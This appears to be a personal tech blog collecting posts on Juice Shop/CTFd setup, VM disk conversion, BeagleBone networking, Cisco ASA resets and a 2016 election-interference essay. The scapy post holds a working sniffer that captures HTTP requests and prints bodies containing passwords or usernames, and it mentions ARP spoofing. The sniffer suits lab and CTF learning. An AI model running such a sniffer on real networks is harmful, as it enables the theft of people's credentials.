Exploring a CTF platform

https://www.owasp.org/index.php/OWASP_Juice_Shop_Project

OWASP Juice Shop is probably the most modern and sophisticated insecure web application! It can be used in security trainings, awareness demos, CTFs and as a guinea pig for security tools! Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications! (https://www.owasp.org/)

Preparation

Base: OWASP Juice Shop Project
CTF extension: CTFd

OS: Ubuntu 18.04 LTS Server
Installer: Docker

1. Installing Docker

$sudo apt-get update
$sudo apt install apt-transport-https ca-certificates curl software-properties-common
$curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
$sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable"
$sudo apt-get update && sudo apt-get upgrade
$apt-cache policy docker-ce
$sudo apt install docker-ce
$sudo systemctl status docker

Running Docker as a normal (non-root) user

$sudo usermod -aG docker ${USER}
$su - ${USER}
$id -nG
#to add a different user instead of the current one:
$sudo usermod -aG docker username

Keep in mind that any member of the docker group can start a container as root with the host filesystem mounted, so docker group membership is effectively root access on the host.

Basic Docker commands

$docker ps -a
$docker kill <containerid>
$docker rm <containerid>
$docker rmi <imageid>

2. Docker Compose

$sudo curl -L https://github.com/docker/compose/releases/download/1.21.2/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
$sudo chmod +x /usr/local/bin/docker-compose
$docker-compose --version

3. OWASP Juice Shop Project

$docker pull bkimminich/juice-shop
$docker run -d -e CTF_KEY="any hash key generated" -e "NODE_ENV=ctf" -p 3000:3000 bkimminich/juice-shop

4. CTFd Installation

$cd /opt
$git clone https://github.com/CTFd/CTFd.git

Modify the docker-compose.yml file from the repository to specify a SECRET_KEY environment variable for the CTFd service:

  environment:
    - SECRET_KEY=<SPECIFY_RANDOM_VALUE>

$docker-compose up
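Both CTF_KEY (step 3) and CTFd's SECRET_KEY (step 4) must be random secrets: Juice Shop derives every flag from CTF_KEY, so anyone who learns the key can compute all flags without solving anything. The helper below is an added example, not part of this page or of the Juice Shop or CTFd projects; it assumes Juice Shop's documented flag derivation (hex HMAC-SHA1 of the challenge name keyed with CTF_KEY) and uses "Score Board" only as a sample challenge name.

```python
import hashlib
import hmac
import secrets


def generate_key(nbytes: int = 32) -> str:
    """Return a random hex key usable as CTF_KEY or as CTFd's SECRET_KEY.

    secrets.token_hex draws from the OS CSPRNG. Never hand-type a key or reuse
    one from an earlier event: whoever knows it can derive every flag.
    """
    return secrets.token_hex(nbytes)


def juice_shop_flag(ctf_key: str, challenge_name: str) -> str:
    """Derive the flag Juice Shop hands out for one challenge.

    Assumption (from the Juice Shop docs, not from this page): the flag is the
    hex HMAC-SHA1 of the challenge name, keyed with the CTF_KEY the container
    was started with. The challenge list imported into CTFd must therefore be
    generated with the same key, or no submitted flag will ever match.
    """
    return hmac.new(ctf_key.encode(), challenge_name.encode(), hashlib.sha1).hexdigest()


def check_submission(ctf_key: str, challenge_name: str, submitted: str) -> bool:
    """Compare a submitted flag with the expected one in constant time."""
    expected = juice_shop_flag(ctf_key, challenge_name)
    return hmac.compare_digest(expected, submitted.strip().lower())
```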

References

https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubuntu-18-04
https://www.digitalocean.com/community/tutorials/how-to-install-docker-compose-on-ubuntu-18-04
https://www.owasp.org/index.php/OWASP_Juice_Shop_Project
https://ctfd.io/
https://www.owasp.org/images/f/f6/OWASP_BeNeLux_2018_Bjoern_Kimminich_-Juice_Shop-_OWASP%27s_most_broken_Flagship.pdf
https://buildmedia.readthedocs.org/media/pdf/ctfd/latest/ctfd.pdf

Converting VMs to Hyper-V

Hyper-V provides a dedicated PowerShell tool for converting other VMs' disks to Hyper-V disks (*.vhd, *.vhdx), but converting images often produces errors depending on the environment. After some trial and error, I found those errors can be categorized.

VMware to Hyper-V (*.vmdk to *.vhdx)

Download the Microsoft Virtual Machine Converter 3.0 tools (MVMC) from Microsoft.
In PowerShell, import the module shipped with MVMC:

PS C:\Users\Administrator> Import-Module 'C:\Program Files\Microsoft Virtual Machine Converter\MvmcCmdlet.psd1'
PS C:\Users\Administrator> ConvertTo-MvmcVirtualHardDisk -SourceLiteralPath d:\scratch\vmx\VM-disk1.vmdk -VhdType DynamicHardDisk -VhdFormat vhdx -Destination c:\vm-disk1

VirtualBox to Hyper-V (*.ova to *.vhdx)

OVA files are simply tar archives containing the OVF directory. After renaming the *.ova file to *.tar, we can extract the .vmdk file from it.

The next step is the same as for a vmdk.

Dealing with errors

Common errors start with "The entry ... is not a supported disk database entry for the descriptor".

The dsfok tool helps modify the descriptor. It extracts the descriptor from the vmdk file and can write it back afterwards. First take the descriptor from the image file with dsfo.exe, edit it, then inject it again with dsfi.exe (arguments: file, offset, size, descriptor file).

dsfo.exe "d:\folder\file.vmdk" 512 1024 descriptorname.txt
dsfi.exe "d:\folder\file.vmdk" 512 1024 descriptorname.txt

Just comment out the entry that generates the error:

ddb.toolsInstallType = "2" --> #ddb.toolsInstallType = "2"
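The same dsfo/dsfi round trip (read 1024 bytes at offset 512, comment out the offending ddb entry, write the descriptor back at the same size) as an added Python example, not part of this page or of the dsfok tool. The sample descriptor and stand-in image are constructed here; the only key taken from the page is ddb.toolsInstallType, the tuple accepts any others MVMC rejects.

```python
import re
import tempfile
from pathlib import Path

DESCRIPTOR_OFFSET = 512  # descriptor follows the 512-byte sparse header (the dsfo/dsfi offset)
DESCRIPTOR_SIZE = 1024   # size of the window the page extracts with dsfo.exe

# Keys MVMC rejects as "not a supported disk database entry". Only ddb.toolsInstallType
# comes from the page; extend the tuple for other entries you hit.
UNSUPPORTED_KEYS = ("ddb.toolsInstallType",)


def comment_out_entries(window: bytes, keys=UNSUPPORTED_KEYS):
    """Return (patched_window, lines_changed) with every 'key = ...' line whose
    key is in keys prefixed by '#'. The window is NUL-padded back to its original
    length so the descriptor still fits its slot and nothing after it shifts."""
    text = window.rstrip(b"\x00").decode("ascii", errors="replace")
    out, changed = [], 0
    for line in text.splitlines(keepends=True):
        body = line.lstrip()
        if not body.startswith("#") and any(
            re.match(rf"{re.escape(k)}\s*=", body) for k in keys
        ):
            line, changed = "#" + line, changed + 1
        out.append(line)
    data = "".join(out).encode("ascii", errors="replace")
    if len(data) > len(window):
        raise ValueError("patched descriptor no longer fits its window")
    return data.ljust(len(window), b"\x00"), changed


def patch_vmdk_descriptor(path: str, keys=UNSUPPORTED_KEYS) -> int:
    """In-place equivalent of dsfo.exe -> edit -> dsfi.exe; returns lines changed.
    Run it on a copy of the .vmdk: a bad write here corrupts the image."""
    with Path(path).open("r+b") as fh:
        fh.seek(DESCRIPTOR_OFFSET)
        data, changed = comment_out_entries(fh.read(DESCRIPTOR_SIZE), keys)
        fh.seek(DESCRIPTOR_OFFSET)
        fh.write(data)
    return changed


def read_descriptor(path: str) -> str:
    """Read the descriptor text back, as dsfo.exe would extract it."""
    with Path(path).open("rb") as fh:
        fh.seek(DESCRIPTOR_OFFSET)
        return fh.read(DESCRIPTOR_SIZE).rstrip(b"\x00").decode("ascii", errors="replace")


SAMPLE_DESCRIPTOR = b"""# Disk DescriptorFile
version=1
CID=fffffffe
parentCID=ffffffff
createType="monolithicSparse"

# Extent description
RW 4192256 SPARSE "VM-disk1.vmdk"

# The Disk Data Base
#DDB

ddb.adapterType = "lsilogic"
ddb.toolsInstallType = "2"
ddb.virtualHWVersion = "10"
"""


def make_sample_vmdk() -> str:
    """Write a constructed stand-in image (not a real disk): 'KDMV' magic in a
    zeroed 512-byte header, then SAMPLE_DESCRIPTOR padded to DESCRIPTOR_SIZE."""
    with tempfile.NamedTemporaryFile(suffix=".vmdk", delete=False) as tmp:
        tmp.write(b"KDMV".ljust(DESCRIPTOR_OFFSET, b"\x00"))
        tmp.write(SAMPLE_DESCRIPTOR.ljust(DESCRIPTOR_SIZE, b"\x00"))
        return tmp.name
```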

References

https://live.osgeo.org/de/quickstart/hyperv_quickstart.html
https://blogs.msdn.microsoft.com/timomta/2015/06/11/how-to-convert-a-vmware-vmdk-to-hyper-v-vhd/
https://stackoverflow.com/questions/37481737/error-when-converting-vmware-virtual-disk-to-hyperv

Installing Crossbuild tools

A cross compiler is a compiler capable of creating executable code for a platform other than the one on which the compiler is running. For example, a compiler that runs on a Windows 7 PC but generates code that runs on an Android smartphone is a cross compiler (Wikipedia).

Dependency check on crossbuild-essential-armhf

We should install three prerequisite packages (actually two, since g++-arm-linux-gnueabihf pulls in gcc-arm-linux-gnueabihf):
dpkg-cross, g++-arm-linux-gnueabihf and gcc-arm-linux-gnueabihf
$sudo apt-get install dpkg-cross g++-arm-linux-gnueabihf

Then, finally, crossbuild-essential-armhf can be installed.
$sudo apt-get install crossbuild-essential-armhf

Simple Code Compile/Execution

Host machine: Ubuntu 18.04.3 LTS, architecture: x86-64

Target machine: Debian 9, architecture: arm

Giving the BBB internet access

I tried many things to connect the BBB to the internet. There are a few different ways, such as enabling the ethernet port or adding a USB Wi-Fi dongle, but they do not work stably when the BBB is moved to a different environment. Thus, I think sharing the host's internet connection is the easiest way to give the BBB internet access. To do this we route all outbound packets from the BBB through the host's internet access interface.

First things first, make a USB connection between the BBB and the host machine.
Then check the IP address on the host's USB network interface.

The host's USB interface has 192.168.7.1, which is the default gateway for the BBB's usb0 interface.

Host Setting

#Enable forwarding of traffic to the internet access interface on the host machine
#In this case, internet traffic from the BBB's USB link (host interface enx4c3fd3c18fa6) is routed to the host's Wi-Fi interface wlp1s0
#These settings do not survive a reboot unless made persistent
$sudo sysctl net.ipv4.ip_forward=1
$sudo iptables --table nat --append POSTROUTING --out-interface wlp1s0 -j MASQUERADE
$sudo iptables --append FORWARD --in-interface enx4c3fd3c18fa6 -j ACCEPT

BBB Setting

#as root on the BBB
# route add default gw 192.168.7.1
# echo "nameserver 8.8.8.8" >> /etc/resolv.conf

CISCO ASA

Image retrieved from cisco.com

Open source or commercial product? I believe each has its pros and cons. pfSense works perfectly as a centralized firewall and includes almost everything, but it needs more computing power when it deals with massive network traffic. The Cisco ASA series is robust and fast, but expensive. So maybe mid-range companies or organizations prefer pfSense, and big companies seem to use legacy bare-bone firewalls. Anyway, it would be better for us to use both kinds of firewalls and compare their functions.

Factory reset

Boot up, then press the Esc key a few times to enter ROMMON
rommon #0> confreg
(answer no when asked to change the configuration)
rommon #1> confreg 0x41
rommon #2> boot
ciscoasa> enable
(blank password)
ciscoasa# write erase
ciscoasa# configure terminal
ciscoasa(config)# config-register 0x01
ciscoasa(config)# exit
ciscoasa# show version
ciscoasa# write
ciscoasa# reload
(log in with a blank password)
ciscoasa(config)# configure factory-default

Setting up ASDM

ciscoasa(config)# enable password mypassword
ciscoasa# show disk0: (to check the ASDM bin)
ciscoasa(config)# asdm image disk0:/asdm-xxx.bin
ciscoasa(config)# username sysadmin password mypassword privilege 15
ciscoasa(config)# aaa authentication http console LOCAL
ciscoasa(config)# http server enable 443

We should also install the JRE, since ASDM runs on Java.
Then add the JRE path to the system environment variables.

Then we can start making the initial configuration for the physical ethernet ports. These might be WAN, management, DMZ1 or DMZ2 depending on the purpose, but I would say we need to check the console and the GUI together to make sure that the configurations are well synchronized. We can add Cisco routers or switches to expand or isolate traffic.

Connecting the BBB with a USB oscilloscope

We used a quite fancy digital oscilloscope in the reverse engineering laboratory. Outside the lab, I had to find a better way to recover my poor learning skills. Honestly, I am not a hardware guy, so there was always plenty of trial and error whenever I played with the BeagleBone. Fortunately, I have now found out how to connect a USB to TTL serial cable and how to display the frequency on the alternative oscilloscope.

Make stable connections with BBB

First things first, we need to connect the BBB to the PC with a regular USB cable.
There is a trick. When the BBB is connected to the PC, the 4 blue LEDs will blink simultaneously. As soon as they stop blinking, plug the USB to TTL cable into the serial debug header. The first pin is GND, the fourth is TX and the fifth is RX. The safe option is to push the reset button in any unusual situation.

Base terminal application

I have been using screen for the Raspberry Pi, but minicom is much better for the BBB since it can modify communication options like hardware flow control.

Just make the same configuration in minicom using the minicom -s option, then save the setup as dfl. The serial device location can be found in dmesg.

PC based digital oscilloscope

The only thing I needed to know was how to recap my hands-on exercises. There were plenty of USB digital oscilloscopes, but I chose Hantek since it was the most cost-effective product on the market. If I had enough budget, I would buy the Analog Discovery 2 USB oscilloscope. Alternatively, I believe the Hantek PC Based USB Digital Storage Oscilloscope 6022BE is enough for my purpose. This article was quite helpful: Top 7 PC-based USB oscilloscopes of 2017: for hobbyists, makers, and pros

Snapshot

I should have followed the wise saying: "There are two types of people: those who back up and those who have yet to lose everything to a system crash."

I wrote some takeaways from my current learning practices in this tidy little space. The website was running on a VM on ESXi for a few months without issue; however, an error occurred while migrating and installing the hypervisors. I thought I had made a full disk backup, but I did not notice that the file contained some errors. So now I am in the middle of recovering my previous records.

Anyway, it's time to move one step further.

Sniffing the network with scapy

There is always a chance of seeing someone else's unencrypted traffic, especially on a local network. Whether via ARP spoofing, poisoning or a gateway attack, Scapy is one of the great tools for checking the network environment.

Prerequisites

$sudo apt-get install python-scapy python-pip
$pip install scapy_http

Enable promiscuous mode on the network interface (eth0 or whichever interface is in use):
$sudo ifconfig <interface> promisc

It is always best to try it on a bridged network. To avoid interference, testing on the local host machine is the best practice.

import argparse
import scapy.all as scapy
from scapy_http import http  # pip install scapy_http (newer scapy also ships scapy.layers.http)


def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", dest="interface", required=True,
                        help="Interface name")
    return parser.parse_args()


def sniff_packet(interface):
    # store=False: do not keep packets in memory; prn runs on every packet
    scapy.sniff(iface=interface, store=False, prn=process_packets)


def get_url(packet):
    # Host and Path are bytes under Python 3; decode before building the string
    request = packet[http.HTTPRequest]
    return (request.Host + request.Path).decode("utf-8", errors="replace")


def get_credentials(packet):
    if packet.haslayer(scapy.Raw):
        # the body is bytes too; decode so the str keywords below can match
        load = packet[scapy.Raw].load.decode("utf-8", errors="replace")
        keywords = ["login", "submission", "challenge", "password", "username", "user", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load
    return None


def process_packets(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] Http Request >> " + url)
        credentials = get_credentials(packet)
        if credentials:
            print("[+] Someone has submitted flag, interested? " + credentials + "\n\n")


if __name__ == "__main__":
    options = get_arguments()
    sniff_packet(options.interface)

Russia’s Meddling in the 2016 U.S. Election

Russia bluntly interfered in the 2016 U.S. presidential election process. That was the unified judgement of all three U.S. intelligence agencies involved, the CIA, the FBI and the NSA. Their report (2017) contained a multitude of detailed disclosures and information about how Russia executed its campaign to influence the presidential election. More specifically, it was a highly orchestrated campaign directed and ordered by Vladimir Putin. The intelligence community stated with high confidence that the Russian government sought to influence the outcome of the 2016 U.S. presidential election in favor of Donald Trump over Hillary Clinton. Russia's motivation for meddling in the presidential election was clear, since Putin and his government preferred Trump for maintaining their regime (Director of National Intelligence, 2017, pp. 3-4).

Russia has accumulated lessons learned from previous cyber campaigns, from Estonia to Ukraine, and successfully integrated them into the 2016 U.S. election attack. First, it started online propaganda using the major social network services. The Russian online disinformation campaign sprawled over Facebook, Twitter and Google through automated social accounts, bots and professional trolls as part of its influence efforts to tarnish Hillary Clinton and promote Donald Trump. They understood exactly how the online media system works and how to influence an audience. Mayer (2018) found that Russian operators shared free and paid posts with "a hundred and twenty-six million American Facebook users" (para. 18). Their audiences were analyzed and targeted to specific voters, including battleground state residents. As their work spread, millions of Americans ended up unknowingly sharing the fake news and viewing the ads, which are illegal. Second, hackers used spear phishing attacks to penetrate the DNC (Democratic National Committee)'s computer network, as well as the emails of individuals like John Podesta, chairman of the Clinton campaign (Lipton, Sanger & Shane, 2016, para. 10). According to Lipton, Sanger and Shane (2016), the hacked information was released through WikiLeaks, the Guccifer 2.0 persona and the site DCLeaks.com. The intelligence community determined that two Russian hacking groups, called Fancy Bear and Cozy Bear, were directly linked to Russia's military intelligence service, the GRU. The GRU directed the cyber operations, and the hacks were part of Russia's efforts not just to undermine confidence in the election but to actively help Trump's victory. After their successful campaign as a kingmaker, Putin and his government made improvements to their cost-effective "Perfect Weapon" (Lipton, Sanger & Shane, 2016, para. 16).

Attacking the Center of Gravity by Controlling Cyberspace

The 2016 U.S. election case demonstrated that cyberattacks have become much more sophisticated. It showed how the attackers identified the enemy's center of gravity and how they compromised cyberspace to achieve their goal. The Russian campaign recalled classical thinkers like Sun Tzu, Clausewitz and Corbett. It is worth knowing how they combined those strategies and how they emasculated the democratic political system, whether it was intended or not. Russia successfully implemented this series of cyber campaigns by controlling the cyberspace around the U.S. In other words, it is safe to say that the best way to attack the center of gravity is to control the enemy's cyberspace.

The Center of Gravity – Psychological relationship 

In terms of cyberattacks, it is clear that Russia attacked the enemy's center of gravity – the strong trust between the populace and its government – for a successful campaign. In modern cyberwarfare, it is not enough to achieve the goal only by attacking social infrastructure such as the power grid. As Clausewitz's (1984) favorite definition of war states, the attacker's long-term objective is achieving its political needs (Book 1, Chapter 1, 24, "War is merely the continuation of policy by other means", para. 1). In order to achieve such a sophisticated objective, sufficient preparation must take precedence. Without knowing the enemy, campaigns easily lead to unintended results such as reunification or a strengthened relationship between populace and government. They also cause backfire such as sanctions or counterattacks against the attacker. Thus, a campaign must be well prepared through massive but accurate enumeration of the target. It must be escalated with a series of collateral damage to the trust between the government and its populace. As Sun Tzu's (1994) immutable truism about preparation puts it, this is the key strategy to not being "endangered in a hundred engagements" ("Planning offensive", para. 10). The center of gravity for a successful campaign was clear to Russia. As the intelligence community has clearly stated, Russia's cyberattacks aimed to "undermine public faith in the US democratic process" (Director of National Intelligence, 2017, p. 7). They compromised American voters and opened gaps between the populace and their government, media and politics, political parties, and between the government and U.S. national security organizations.

Attacker’s advantage  

Throughout the history of conventional warfare, the advantage has lain with the defending side. Sun Tzu (1994) asserted that "whoever occupies the battleground first and awaits the enemy will be at ease" ("Vacuity and Substance", para. 1). Clausewitz (1984) argued that "defense is easier than attack" in warfare since "it is easier to hold ground than take it" (Book 6, Chapter 1, "Advantages of defence", para. 1), and Corbett (1911) also believed that a defensive strategy is more favorable than an offensive one, saying that "active defensive operations" are important "to prevent the enemy achieving any positive result" in sea battle (Chapter 3, "Defensive Fleet Operation – A Fleet in Being", para. 3). However, unlike what those military thinkers described, attackers have the upper hand on the cyber battlefield. This is because cyberwarfare is a vastly different world from physical space. First, there are no physical barriers and no overt weapons. As information is highly centralized and people are connected online all the time, there are great chances for an attacker to find bits of serendipity. For instance, Russia's reach online was unprecedented and sophisticated. However, they also used old-school tactics such as phishing emails. John Podesta was one of the victims and became a high-value asset for Russia. Second, there is an information imbalance between attackers and defenders. Hackers enumerated and gathered information about their target from a long-term perspective and then activated their campaigns simultaneously. These unknown and covert attacks keep the target on the defensive, because even small successes in their attacks can cause massive chaos in the target system.

Command of the Bits 

As seen in the attributes of cyberspace, it is neither unpredictable nor uncontrollable, as in Corbett's maritime strategy. Cyberspace is not a battlefield; rather, it is a space to be controlled for winning a war. No country can win a modern war only by utilizing physical weapons. Russia chose cyberspace as its strategic battlefield. Cyberspace was the perfect weapon for Russia because it is "a low-cost, high-impact weapon that Russia had test-fired in elections from Ukraine to Europe" (Lipton et al., 2016, para. 16). For Russia, "with an enfeebled economy and a nuclear arsenal it cannot use short of all-out war, cyberpower proved the perfect weapon: cheap, hard to see coming, hard to trace" (Lipton et al., 2016, para. 16). Putin and his government directly targeted the U.S. center of gravity – the strong trust between the populace and its government – by controlling cyberspace. They investigated, planned and presented their series of multiple campaigns. Just as Corbett (1911) argued that "the object of naval warfare is the control of communications" (Chapter 1, "Theory of the Object – Command of the Sea", para. 11), Russian hackers paralyzed U.S. media outlets by reframing and setting the political agenda through leaked emails and generated disinformation. As Mayer (2018) reported, they exploited stolen emails from Podesta's account to fade Trump's "Access Hollywood" (para. 30) scandal. These activities, operated through Russian advertisements and social media bots, did far more damage than any of the compromised servers.

Russian-backed hackers maximized the benefits of cyberspace for their campaign. It is easy to hide and easy to keep their actions undiscovered. In cyberspace, it is impossible to distinguish friends from enemies. Hackers posed as innocent American voters who support freedom of speech. Cyberspace also allowed the attackers operational flexibility. They dynamically reflected on and changed their operations depending on what they discovered and how the U.S. reacted to their attacks. As the Obama administration escalated the investigation into the Russian hacking, Russia provided the hacked emails from Hillary Clinton to WikiLeaks and started slowly leaking them to the public (Mayer, 2018, para. 29). It became a smoking gun against Hillary and a black hole to absorb their risks.

Leaked weaknesses 

As the cyber attacks continued, the U.S. democratic system leaked lots of weaknesses. Politicians used the foreign government's cyber attacks as chances to regain political position, and media outlets reproduced gossip and fake news. Even Donald Trump "gleefully cited many of the purloined emails on the campaign trail" (Lipton et al., 2016, para. 12). As soon as Hillary's emails had been hacked, massive amounts of fake news were generated by Russian-backed media and delivered directly to the public. It did not matter whether that news was fact or not. Even general U.S. voters lacked media literacy, since they are always overwhelmed by information overload. Russia's case also reminds us of the importance of acknowledging personal cyber security guidance. Even in highly secured government facilities, a single inconsiderate action such as clicking on an email crafted by a hacker can paralyze the entire security system. Cyber security is not a technical matter; rather, it is a process. Hackers successfully compromised that process.

Conclusion 

For Clausewitz, war was "the realm of uncertainty" and "wrapped in a fog" (Book 1, Chapter 3, "On Military Genius", para. 10). It has become even more unpredictable in modern war. Attackers get a vote in cyberspace. They are waging war and gaining leverage by controlling cyberspace. There is no doubt that Russia's meddling in other nations' political systems will happen again unless the issues exposed during Russia's cyber campaign in the 2016 U.S. presidential election are fixed. Political systems were easily paralyzed and divided by a toxic atmosphere. The populace was polarized, and the media outlets did not function properly. Even the intelligence community failed to react immediately. Most nations in the world today are facing an unprecedented challenge in defending themselves against this psychological cyber warfare. Attackers' methods have been growing more sophisticated. There is no clear prescription; however, it is clear that defensive strategies also need to be sophisticated and well orchestrated.

References

Clausewitz, C., Howard, M., Paret, P., & Brodie, B. (1984). On war. Princeton, NJ: Princeton University Press.

Corbett, J. (1911). Principles of maritime strategy. London: Longmans.

Director of National Intelligence, United States. (2017). Background to “assessing Russian activities and intentions in recent US elections”: The analytic process and cyber incident attribution. https://www.intelligence.senate.gov/sites/default/files/documents/ICA_2017_01.pdf 

Lipton, E., Sanger, D., & Shane, S. (2016, December 13). The perfect weapon: How Russian cyberpower invaded the US. The New York Times. https://www.nytimes.com/2016/12/13/us/politics/russia-hack-election-dnc.html

Mayer, J. (2018, September 24). How Russia helped swing the election for Trump. The New Yorker. https://www.newyorker.com/magazine/2018/10/01/how-russia-helped-to-swing-theelection-for-trump

Sun Tzu (1994). The art of war. (R. Sawyer, Trans.). Boulder, CO: Westview Press.